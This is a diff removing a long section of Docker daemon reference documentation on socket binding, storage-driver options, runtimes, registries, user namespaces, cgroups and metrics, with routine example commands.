-the empty string is equivalent to setting the `--tlsverify` flag. The following
-are equivalent:
-
-```bash
-$ docker --tlsverify ps
-# or
-$ export DOCKER_TLS_VERIFY=1
-$ docker ps
-```
-
-The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`
-environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes
-precedence over `HTTP_PROXY`.
-
-### Bind Docker to another host/port or a Unix socket
-
-> **Warning**:
-> Changing the default `docker` daemon binding to a
-> TCP port or Unix *docker* user group will increase your security risks
-> by allowing non-root users to gain *root* access on the host. Make sure
-> you control access to `docker`. If you are binding
-> to a TCP port, anyone with access to that port has full Docker access;
-> so it is not advisable on an open network.
-
-With `-H` it is possible to make the Docker daemon to listen on a
-specific IP and port. By default, it will listen on
-`unix:///var/run/docker.sock` to allow only local connections by the
-*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP
-to give access to everybody, but that is **not recommended** because
-then it is trivial for someone to gain root access to the host where the
-daemon is running.
-
-Similarly, the Docker client can use `-H` to connect to a custom port.
-The Docker client will default to connecting to `unix:///var/run/docker.sock`
-on Linux, and `tcp://127.0.0.1:2376` on Windows.
-
-`-H` accepts host and port assignment in the following format:
-
-    tcp://[host]:[port][path] or unix://path
-
-For example:
-
--   `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption
-    is on, or port `2375` when communication is in plain text.
--   `tcp://host:2375` -> TCP connection on
-    host:2375
--   `tcp://host:2375/path` -> TCP connection on
-    host:2375 and prepend path to all requests
--   `unix://path/to/socket` -> Unix socket located
-    at `path/to/socket`
-
-`-H`, when empty, will default to the same value as
-when no `-H` was passed in.
-
-`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port`
-
-Run Docker in daemon mode:
-
-```bash
-$ sudo <path to>/dockerd -H 0.0.0.0:5555 &
-```
-
-Download an `ubuntu` image:
-
-```bash
-$ docker -H :5555 pull ubuntu
-```
-
-You can use multiple `-H`, for example, if you want to listen on both
-TCP and a Unix socket
-
-```bash
-# Run docker in daemon mode
-$ sudo <path to>/dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock &
-# Download an ubuntu image, use default Unix socket
-$ docker pull ubuntu
-# OR use the TCP port
-$ docker -H tcp://127.0.0.1:2375 pull ubuntu
-```
-
-### Daemon storage-driver option
-
-The Docker daemon has support for several different image layer storage
-drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`.
-
-The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that
-is unlikely to be merged into the main kernel. These are also known to cause
-some serious kernel crashes. However, `aufs` allows containers to share
-executable and shared library memory, so is a useful choice when running
-thousands of containers with the same program or libraries.
-
-The `devicemapper` driver uses thin provisioning and Copy on Write (CoW)
-snapshots. For each devicemapper graph location – typically
-`/var/lib/docker/devicemapper` – a thin pool is created based on two block
-devices, one for data and one for metadata. By default, these block devices
-are created automatically by using loopback mounts of automatically created
-sparse files. Refer to [Storage driver options](#storage-driver-options) below
-for a way how to customize this setup.
-[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/)
-article explains how to tune your existing setup without the use of options.
-
-The `btrfs` driver is very fast for `docker build` - but like `devicemapper`
-does not share executable memory between devices. Use
-`dockerd -s btrfs -g /mnt/btrfs_partition`.
-
-The `zfs` driver is probably not as fast as `btrfs` but has a longer track record
-on stability. Thanks to `Single Copy ARC` shared blocks between clones will be
-cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem
-set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options).
-
-The `overlay` is a very fast union filesystem. It is now merged in the main
-Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay`
-also supports page cache sharing, this means multiple containers accessing
-the same file can share a single page cache entry (or entries), it makes
-`overlay` as efficient with memory as `aufs` driver. Call
-`dockerd -s overlay` to use it.
-
-> **Note:**
-> As promising as `overlay` is, the feature is still quite young and should not
-> be used in production. Most notably, using `overlay` can cause excessive
-> inode consumption (especially as the number of images grows), as well as
-> being incompatible with the use of RPMs.
-
-The `overlay2` uses the same fast union filesystem but takes advantage of
-[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux
-kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2`
-to use it.
-
-> **Note:**
-> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any
-> Copy on Write filesystem and should only be used over `ext4` partitions.
-
-### Storage driver options
-
-Particular storage-driver can be configured with options specified with
-`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`,
-options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`.
-
-#### Devicemapper options
-
-*   `dm.thinpooldev`
-
-    Specifies a custom block storage device to use for the thin pool.
-
-    If using a block device for device mapper storage, it is best to use `lvm`
-    to create and manage the thin-pool volume. This volume is then handed to Docker
-    to exclusively create snapshot volumes needed for images and containers.
-
-    Managing the thin-pool outside of Engine makes for the most feature-rich
-    method of having Docker utilize device mapper thin provisioning as the
-    backing storage for Docker containers. The highlights of the lvm-based
-    thin-pool management feature include: automatic or interactive thin-pool
-    resize support, dynamically changing thin-pool features, automatic thinp
-    metadata checking when lvm activates the thin-pool, etc.
-
-    As a fallback if no thin pool is provided, loopback files are
-    created. Loopback is very slow, but can be used without any
-    pre-configuration of storage. It is strongly recommended that you do
-    not use loopback in production. Ensure your Engine daemon has a
-    `--storage-opt dm.thinpooldev` argument provided.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool
-    ```
-
-*   `dm.basesize`
-
-    Specifies the size to use when creating the base device, which limits the
-    size of images and containers. The default value is 10G. Note, thin devices
-    are inherently "sparse", so a 10G device which is mostly empty doesn't use
-    10 GB of space on the pool. However, the filesystem will use more space for
-    the empty case the larger the device is.
-
-    The base device size can be increased at daemon restart which will allow
-    all future images and containers (based on those new images) to be of the
-    new base device size.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.basesize=50G
-    ```
-
-    This will increase the base device size to 50G. The Docker daemon will throw an
-    error if existing base device size is larger than 50G. A user can use
-    this option to expand the base device size however shrinking is not permitted.
-
-    This value affects the system-wide "base" empty filesystem
-    that may already be initialized and inherited by pulled images. Typically,
-    a change to this value requires additional steps to take effect:
-
-     ```bash
-    $ sudo service docker stop
-    $ sudo rm -rf /var/lib/docker
-    $ sudo service docker start
-    ```
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.basesize=20G
-    ```
-
-*   `dm.loopdatasize`
-
-    > **Note**:
-    > This option configures devicemapper loopback, which should not
-    > be used in production.
-
-    Specifies the size to use when creating the loopback file for the
-    "data" device which is used for the thin pool. The default size is
-    100G. The file is sparse, so it will not initially take up this
-    much space.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.loopdatasize=200G
-    ```
-
-*   `dm.loopmetadatasize`
-
-    > **Note**:
-    > This option configures devicemapper loopback, which should not
-    > be used in production.
-
-    Specifies the size to use when creating the loopback file for the
-    "metadata" device which is used for the thin pool. The default size
-    is 2G. The file is sparse, so it will not initially take up
-    this much space.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.loopmetadatasize=4G
-    ```
-
-*   `dm.fs`
-
-    Specifies the filesystem type to use for the base device. The supported
-    options are "ext4" and "xfs". The default is "xfs"
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.fs=ext4
-    ```
-
-*   `dm.mkfsarg`
-
-    Specifies extra mkfs arguments to be used when creating the base device.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"
-    ```
-
-*   `dm.mountopt`
-
-    Specifies extra mount options used when mounting the thin devices.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.mountopt=nodiscard
-    ```
-
-*   `dm.datadev`
-
-    (Deprecated, use `dm.thinpooldev`)
-
-    Specifies a custom blockdevice to use for data for the thin pool.
-
-    If using a block device for device mapper storage, ideally both datadev and
-    metadatadev should be specified to completely avoid using the loopback
-    device.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd \
-          --storage-opt dm.datadev=/dev/sdb1 \
-          --storage-opt dm.metadatadev=/dev/sdc1
-    ```
-
-*   `dm.metadatadev`
-
-    (Deprecated, use `dm.thinpooldev`)
-
-    Specifies a custom blockdevice to use for metadata for the thin pool.
-
-    For best performance the metadata should be on a different spindle than the
-    data, or even better on an SSD.
-
-    If setting up a new metadata pool it is required to be valid. This can be
-    achieved by zeroing the first 4k to indicate empty metadata, like this:
-
-    ```bash
-    $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1
-    ```
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd \
-          --storage-opt dm.datadev=/dev/sdb1 \
-          --storage-opt dm.metadatadev=/dev/sdc1
-    ```
-
-*   `dm.blocksize`
-
-    Specifies a custom blocksize to use for the thin pool. The default
-    blocksize is 64K.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.blocksize=512K
-    ```
-
-*   `dm.blkdiscard`
-
-    Enables or disables the use of blkdiscard when removing devicemapper
-    devices. This is enabled by default (only) if using loopback devices and is
-    required to resparsify the loopback file on image/container removal.
-
-    Disabling this on loopback can lead to *much* faster container removal
-    times, but will make the space used in `/var/lib/docker` directory not be
-    returned to the system for other use when containers are removed.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.blkdiscard=false
-    ```
-
-*   `dm.override_udev_sync_check`
-
-    Overrides the `udev` synchronization checks between `devicemapper` and `udev`.
-    `udev` is the device manager for the Linux kernel.
-
-    To view the `udev` sync support of a Docker daemon that is using the
-    `devicemapper` driver, run:
-
-    ```bash
-    $ docker info
-    [...]
-    Udev Sync Supported: true
-    [...]
-    ```
-
-    When `udev` sync support is `true`, then `devicemapper` and udev can
-    coordinate the activation and deactivation of devices for containers.
-
-    When `udev` sync support is `false`, a race condition occurs between
-    the`devicemapper` and `udev` during create and cleanup. The race condition
-    results in errors and failures. (For information on these failures, see
-    [docker#4036](https://github.com/docker/docker/issues/4036))
-
-    To allow the `docker` daemon to start, regardless of `udev` sync not being
-    supported, set `dm.override_udev_sync_check` to true:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.override_udev_sync_check=true
-    ```
-
-    When this value is `true`, the  `devicemapper` continues and simply warns
-    you the errors are happening.
-
-    > **Note:**
-    > The ideal is to pursue a `docker` daemon and environment that does
-    > support synchronizing with `udev`. For further discussion on this
-    > topic, see [docker#4036](https://github.com/docker/docker/issues/4036).
-    > Otherwise, set this flag for migrating existing Docker daemons to
-    > a daemon with a supported environment.
-
-*   `dm.use_deferred_removal`
-
-    Enables use of deferred device removal if `libdm` and the kernel driver
-    support the mechanism.
-
-    Deferred device removal means that if device is busy when devices are
-    being removed/deactivated, then a deferred removal is scheduled on
-    device. And devices automatically go away when last user of the device
-    exits.
-
-    For example, when a container exits, its associated thin device is removed.
-    If that device has leaked into some other mount namespace and can't be
-    removed, the container exit still succeeds and this option causes the
-    system to schedule the device for deferred removal. It does not wait in a
-    loop trying to remove a busy device.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.use_deferred_removal=true
-    ```
-
-*   `dm.use_deferred_deletion`
-
-    Enables use of deferred device deletion for thin pool devices. By default,
-    thin pool device deletion is synchronous. Before a container is deleted,
-    the Docker daemon removes any associated devices. If the storage driver
-    can not remove a device, the container deletion fails and daemon returns.
-
-        Error deleting container: Error response from daemon: Cannot destroy container
-
-    To avoid this failure, enable both deferred device deletion and deferred
-    device removal on the daemon.
-
-    ```bash
-    $ sudo dockerd \
-          --storage-opt dm.use_deferred_deletion=true \
-          --storage-opt dm.use_deferred_removal=true
-    ```
-
-    With these two options enabled, if a device is busy when the driver is
-    deleting a container, the driver marks the device as deleted. Later, when
-    the device isn't in use, the driver deletes it.
-
-    In general it should be safe to enable this option by default. It will help
-    when unintentional leaking of mount point happens across multiple mount
-    namespaces.
-
-*   `dm.min_free_space`
-
-    Specifies the min free space percent in a thin pool require for new device
-    creation to succeed. This check applies to both free data space as well
-    as free metadata space. Valid values are from 0% - 99%. Value 0% disables
-    free space checking logic. If user does not specify a value for this option,
-    the Engine uses a default value of 10%.
-
-    Whenever a new a thin pool device is created (during `docker pull` or during
-    container creation), the Engine checks if the minimum free space is
-    available. If sufficient space is unavailable, then device creation fails
-    and any relevant `docker` operation fails.
-
-    To recover from this error, you must create more free space in the thin pool
-    to recover from the error. You can create free space by deleting some images
-    and containers from the thin pool. You can also add more storage to the thin
-    pool.
-
-    To add more space to a LVM (logical volume management) thin pool, just add
-    more storage to the volume group container thin pool; this should automatically
-    resolve any errors. If your configuration uses loop devices, then stop the
-    Engine daemon, grow the size of loop files and restart the daemon to resolve
-    the issue.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.min_free_space=10%
-    ```
-
-*  `dm.xfs_nospace_max_retries`
-
-    Specifies the maximum number of retries XFS should attempt to complete
-    IO when ENOSPC (no space) error is returned by underlying storage device.
-
-    By default XFS retries infinitely for IO to finish and this can result
-    in unkillable process. To change this behavior one can set
-    xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting
-    ENOSPC and will shutdown filesystem.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
-    ```
-
-#### ZFS options
-
-*   `zfs.fsname`
-
-    Set zfs filesystem under which docker will create its own datasets.
-    By default docker will pick up the zfs filesystem where docker graph
-    (`/var/lib/docker`) is located.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker
-    ```
-
-#### Btrfs options
-
-*   `btrfs.min_space`
-
-    Specifies the minimum size to use when creating the subvolume which is used
-    for containers. If user uses disk quota for btrfs when creating or running
-    a container with **--storage-opt size** option, docker should ensure the
-    **size** cannot be smaller than **btrfs.min_space**.
-
-    Example use:
-
-    ```bash
-    $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G
-    ```
-
-#### Overlay2 options
-
-*   `overlay2.override_kernel_check`
-
-    Overrides the Linux kernel version check allowing overlay2. Support for
-    specifying multiple lower directories needed by overlay2 was added to the
-    Linux kernel in 4.0.0. However some older kernel versions may be patched
-    to add multiple lower directory support for OverlayFS. This option should
-    only be used after verifying this support exists in the kernel. Applying
-    this option on a kernel without this support will cause failures on mount.
-
-## Docker runtime execution options
-
-The Docker daemon relies on a
-[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime
-(invoked via the `containerd` daemon) as its interface to the Linux
-kernel `namespaces`, `cgroups`, and `SELinux`.
-
-By default, the Docker daemon automatically starts `containerd`. If you want to
-control `containerd` startup, manually start `containerd` and pass the path to
-the `containerd` socket using the `--containerd` flag. For example:
-
-```bash
-$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock
-```
-
-Runtimes can be registered with the daemon either via the
-configuration file or using the `--add-runtime` command line argument.
-
-The following is an example adding 2 runtimes via the configuration:
-
-```json
-{
-	"default-runtime": "runc",
-	"runtimes": {
-		"runc": {
-			"path": "runc"
-		},
-		"custom": {
-			"path": "/usr/local/bin/my-runc-replacement",
-			"runtimeArgs": [
-				"--debug"
-			]
-		}
-	}
-}
-```
-
-This is the same example via the command line:
-
-```bash
-$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
-```
-
-> **Note**: defining runtime arguments via the command line is not supported.
-
-## Options for the runtime
-
-You can configure the runtime using options specified
-with the `--exec-opt` flag. All the flag's options have the `native` prefix. A
-single `native.cgroupdriver` option is available.
-
-The `native.cgroupdriver` option specifies the management of the container's
-cgroups. You can specify only specify `cgroupfs` or `systemd`. If you specify
-`systemd` and it is not available, the system errors out. If you omit the
-`native.cgroupdriver` option,` cgroupfs` is used.
-
-This example sets the `cgroupdriver` to `systemd`:
-
-```bash
-$ sudo dockerd --exec-opt native.cgroupdriver=systemd
-```
-
-Setting this option applies to all containers the daemon launches.
-
-Also Windows Container makes use of `--exec-opt` for special purpose. Docker user
-can specify default container isolation technology with this, for example:
-
-```bash
-$ sudo dockerd --exec-opt isolation=hyperv
-```
-
-Will make `hyperv` the default isolation technology on Windows. If no isolation
-value is specified on daemon start, on Windows client, the default is
-`hyperv`, and on Windows server, the default is `process`.
-
-## Daemon DNS options
-
-To set the DNS server for all Docker containers, use:
-
-```bash
-$ sudo dockerd --dns 8.8.8.8
-```
-
-
-To set the DNS search domain for all Docker containers, use:
-
-```bash
-$ sudo dockerd --dns-search example.com
-```
-
-
-## Insecure registries
-
-Docker considers a private registry either secure or insecure. In the rest of
-this section, *registry* is used for *private registry*, and `myregistry:5000`
-is a placeholder example for a private registry.
-
-A secure registry uses TLS and a copy of its CA certificate is placed on the
-Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure
-registry is either not using TLS (i.e., listening on plain text HTTP), or is
-using TLS with a CA certificate not known by the Docker daemon. The latter can
-happen when the certificate was not found under
-`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification
-failed (i.e., wrong CA).
-
-By default, Docker assumes all, but local (see local registries below),
-registries are secure. Communicating with an insecure registry is not possible
-if Docker assumes that registry is secure. In order to communicate with an
-insecure registry, the Docker daemon requires `--insecure-registry` in one of
-the following two forms:
-
-* `--insecure-registry myregistry:5000` tells the Docker daemon that
-  myregistry:5000 should be considered insecure.
-* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries
-  whose domain resolve to an IP address is part of the subnet described by the
-  CIDR syntax, should be considered insecure.
-
-The flag can be used multiple times to allow multiple registries to be marked
-as insecure.
-
-If an insecure registry is not marked as insecure, `docker pull`,
-`docker push`, and `docker search` will result in an error message prompting
-the user to either secure or pass the `--insecure-registry` flag to the Docker
-daemon as described above.
-
-Local registries, whose IP address falls in the 127.0.0.0/8 range, are
-automatically marked as insecure as of Docker 1.3.2. It is not recommended to
-rely on this, as it may change in the future.
-
-Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted
-communication, can be useful when running a local registry.  However,
-because its use creates security vulnerabilities it should ONLY be enabled for
-testing purposes.  For increased security, users should add their CA to their
-system's list of trusted CAs instead of enabling `--insecure-registry`.
-
-## Legacy Registries
-
-Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol.  Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries.  The exception to this is `search` which can still be performed on v1 registries.
-
-## Running a Docker daemon behind an HTTPS_PROXY
-
-When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub
-certificates will be replaced by the proxy's certificates. These certificates
-need to be added to your Docker host's configuration:
-
-1. Install the `ca-certificates` package for your distribution
-2. Ask your network admin for the proxy's CA certificate and append them to
-   `/etc/pki/tls/certs/ca-bundle.crt`
-3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`.
-   The `username:` and `password@` are optional - and are only needed if your
-   proxy is set up to require authentication.
-
-This will only add the proxy and authentication to the Docker daemon's requests -
-your `docker build`s and running containers will need extra configuration to
-use the proxy
-
-## Default Ulimits
-
-`--default-ulimit` allows you to set the default `ulimit` options to use for
-all containers. It takes the same options as `--ulimit` for `docker run`. If
-these defaults are not set, `ulimit` settings will be inherited, if not set on
-`docker run`, from the Docker daemon. Any `--ulimit` options passed to
-`docker run` will overwrite these defaults.
-
-Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to
-set the maximum number of processes available to a user, not to a container. For details
-please check the [run](run.md) reference.
-
-## Nodes discovery
-
-The `--cluster-advertise` option specifies the `host:port` or `interface:port`
-combination that this particular daemon instance should use when advertising
-itself to the cluster. The daemon is reached by remote hosts through this value.
-If you  specify an interface, make sure it includes the IP address of the actual
-Docker host. For Engine installation created through `docker-machine`, the
-interface is typically `eth1`.
-
-The daemon uses [libkv](https://github.com/docker/libkv/) to advertise
-the node within the cluster. Some key-value backends support mutual
-TLS. To configure the client TLS settings used by the daemon can be configured
-using the `--cluster-store-opt` flag, specifying the paths to PEM encoded
-files. For example:
-
-```bash
-$ sudo dockerd \
-    --cluster-advertise 192.168.1.2:2376 \
-    --cluster-store etcd://192.168.1.2:2379 \
-    --cluster-store-opt kv.cacertfile=/path/to/ca.pem \
-    --cluster-store-opt kv.certfile=/path/to/cert.pem \
-    --cluster-store-opt kv.keyfile=/path/to/key.pem
-```
-
-The currently supported cluster store options are:
-
-*   `discovery.heartbeat`
-
-    Specifies the heartbeat timer in seconds which is used by the daemon as a
-    keepalive mechanism to make sure discovery module treats the node as alive
-    in the cluster. If not configured, the default value is 20 seconds.
-
-*   `discovery.ttl`
-
-    Specifies the ttl (time-to-live) in seconds which is used by the discovery
-    module to timeout a node if a valid heartbeat is not received within the
-    configured ttl value. If not configured, the default value is 60 seconds.
-
-*   `kv.cacertfile`
-
-    Specifies the path to a local file with PEM encoded CA certificates to trust
-
-*   `kv.certfile`
-
-    Specifies the path to a local file with a PEM encoded certificate.  This
-    certificate is used as the client cert for communication with the
-    Key/Value store.
-
-*   `kv.keyfile`
-
-    Specifies the path to a local file with a PEM encoded private key.  This
-    private key is used as the client key for communication with the
-    Key/Value store.
-
-*   `kv.path`
-
-    Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'.
-
-## Access authorization
-
-Docker's access authorization can be extended by authorization plugins that your
-organization can purchase or build themselves. You can install one or more
-authorization plugins when you start the Docker `daemon` using the
-`--authorization-plugin=PLUGIN_ID` option.
-
-```bash
-$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
-```
-
-The `PLUGIN_ID` value is either the plugin's name or a path to its specification
-file. The plugin's implementation determines whether you can specify a name or
-path. Consult with your Docker administrator to get information about the
-plugins available to you.
-
-Once a plugin is installed, requests made to the `daemon` through the command
-line or Docker's Engine API are allowed or denied by the plugin.  If you have
-multiple plugins installed, at least one must allow the request for it to
-complete.
-
-For information about how to create an authorization plugin, see [authorization
-plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation.
-
-
-## Daemon user namespace options
-
-The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling
-a process, and therefore a container, to have a unique range of user and
-group IDs which are outside the traditional user and group range utilized by
-the host system. Potentially the most important security improvement is that,
-by default, container processes running as the `root` user will have expected
-administrative privilege (with some restrictions) inside the container but will
-effectively be mapped to an unprivileged `uid` on the host.
-
-When user namespace support is enabled, Docker creates a single daemon-wide mapping
-for all containers running on the same engine instance. The mappings will
-utilize the existing subordinate user and group ID feature available on all modern
-Linux distributions.
-The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and
-[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be
-read for the user, and optional group, specified to the `--userns-remap`
-parameter.  If you do not wish to specify your own user and/or group, you can
-provide `default` as the value to this flag, and a user will be created on your behalf
-and provided subordinate uid and gid ranges. This default user will be named
-`dockremap`, and entries will be created for it in `/etc/passwd` and
-`/etc/group` using your distro's standard user and group creation tools.
-
-> **Note**: The single mapping per-daemon restriction is in place for now
-> because Docker shares image layers from its local cache across all
-> containers running on the engine instance.  Since file ownership must be
-> the same for all containers sharing the same layer content, the decision
-> was made to map the file ownership on `docker pull` to the daemon's user and
-> group mappings so that there is no delay for running containers once the
-> content is downloaded. This design preserves the same performance for `docker
-> pull`, `docker push`, and container startup as users expect with
-> user namespaces disabled.
-
-### Starting the daemon with user namespaces enabled
-
-To enable user namespace support, start the daemon with the
-`--userns-remap` flag, which accepts values in the following formats:
-
- - uid
- - uid:gid
- - username
- - username:groupname
-
-If numeric IDs are provided, translation back to valid user or group names
-will occur so that the subordinate uid and gid information can be read, given
-these resources are name-based, not id-based.  If the numeric ID information
-provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon
-startup will fail with an error message.
-
-**Example: starting with default Docker user management:**
-
-```bash
-$ sudo dockerd --userns-remap=default
-```
-
-When `default` is provided, Docker will create - or find the existing - user and group
-named `dockremap`. If the user is created, and the Linux distribution has
-appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated
-with a contiguous 65536 length range of subordinate user and group IDs, starting
-at an offset based on prior entries in those files.  For example, Ubuntu will
-create the following range, based on an existing user named `user1` already owning
-the first 65536 range:
-
-```bash
-$ cat /etc/subuid
-user1:100000:65536
-dockremap:165536:65536
-```
-
-If you have a preferred/self-managed user with subordinate ID mappings already
-configured, you can provide that username or uid to the `--userns-remap` flag.
-If you have a group that doesn't match the username, you may provide the `gid`
-or group name as well; otherwise the username will be used as the group name
-when querying the system for the subordinate group ID range.
-
-The output of `docker info` can be used to determine if the daemon is running
-with user namespaces enabled or not. If the daemon is configured with user
-namespaces, the Security Options entry in the response will list "userns" as
-one of the enabled security features.
-
-### Detailed information on `subuid`/`subgid` ranges
-
-Given potential advanced use of the subordinate ID ranges by power users, the
-following paragraphs define how the Docker daemon currently uses the range entries
-found within the subordinate range files.
-
-The simplest case is that only one contiguous range is defined for the
-provided user or group. In this case, Docker will use that entire contiguous
-range for the mapping of host uids and gids to the container process.  This
-means that the first ID in the range will be the remapped root user, and the
-IDs above that initial ID will map host ID 1 through the end of the range.
-
-From the example `/etc/subuid` content shown above, the remapped root
-user would be uid 165536.
-
-If the system administrator has set up multiple ranges for a single user or
-group, the Docker daemon will read all the available ranges and use the
-following algorithm to create the mapping ranges:
-
-1. The range segments found for the particular user will be sorted by *start ID* ascending.
-2. Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user.
-3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `proc/self/gid_map`.
-
-### Disable user namespace for a container
-
-If you enable user namespaces on the daemon, all containers are started
-with user namespaces enabled. In some situations you might want to disable
-this feature for a container, for example, to start a privileged container (see
-[user namespace known restrictions](#user-namespace-known-restrictions)).
-To enable those advanced features for a specific container use `--userns=host`
-in the `run/exec/create` command.
-This option will completely disable user namespace mapping for the container's user.
-
-### User namespace known restrictions
-
-The following standard Docker features are currently incompatible when
-running a Docker daemon with user namespaces enabled:
-
- - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`)
- - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`)
-
-In general, user namespaces are an advanced feature and will require
-coordination with other capabilities. For example, if volumes are mounted from
-the host, file ownership will have to be pre-arranged if the user or
-administrator wishes the containers to have expected access to the volume
-contents. Note that when using external volume or graph driver plugins, those
-external software programs must be made aware of user and group mapping ranges
-if they are to work seamlessly with user namespace support.
-
-Finally, while the `root` user inside a user namespaced container process has
-many of the expected admin privileges that go along with being the superuser, the
-Linux kernel has restrictions based on internal knowledge that this is a user namespaced
-process. The most notable restriction that we are aware of at this time is the
-inability to use `mknod`. Permission will be denied for device creation even as
-container `root` inside a user namespace.
-
-## Miscellaneous options
-
-IP masquerading uses address translation to allow containers without a public
-IP to talk to other machines on the Internet. This may interfere with some
-network topologies and can be disabled with `--ip-masq=false`.
-
-Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and
-for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be
-set like this:
-
-    DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1
-    # or
-    export DOCKER_TMPDIR=/mnt/disk2/tmp
-    /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1
-
-## Default cgroup parent
-
-The `--cgroup-parent` option allows you to set the default cgroup parent
-to use for containers. If this option is not set, it defaults to `/docker` for
-fs cgroup driver and `system.slice` for systemd cgroup driver.
-
-If the cgroup has a leading forward slash (`/`), the cgroup is created
-under the root cgroup, otherwise the cgroup is created under the daemon
-cgroup.
-
-Assuming the daemon is running in cgroup `daemoncgroup`,
-`--cgroup-parent=/foobar` creates a cgroup in
-`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar`
-creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar`
-
-The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd
-represents hierarchy by slice and the name of the slice encodes the location in
-the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A
-name can consist of a dash-separated series of names, which describes the path
-to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice`
-means the memory cgroup for the container is created in
-`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-<id>.scope`.
-
-This setting can also be set per container, using the `--cgroup-parent`
-option on `docker create` and `docker run`, and takes precedence over
-the `--cgroup-parent` option on the daemon.
-
-## Daemon Metrics
-
-The `--metrics-addr` option takes a tcp address to serve the metrics API.
-This feature is still experimental, therefore, the daemon must be running in experimental
-mode for this feature to work.
-
-To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337`
-allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the
-[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format.
-
-If you are running a prometheus server you can add this address to your scrape configs
-to have prometheus collect metrics on Docker.  For more information
-on prometheus you can view the website [here](https://prometheus.io/).
-
-```yml
-scrape_configs:
-  - job_name: 'docker'
-    static_configs:
-      - targets: ['127.0.0.1:1337']
-```
-
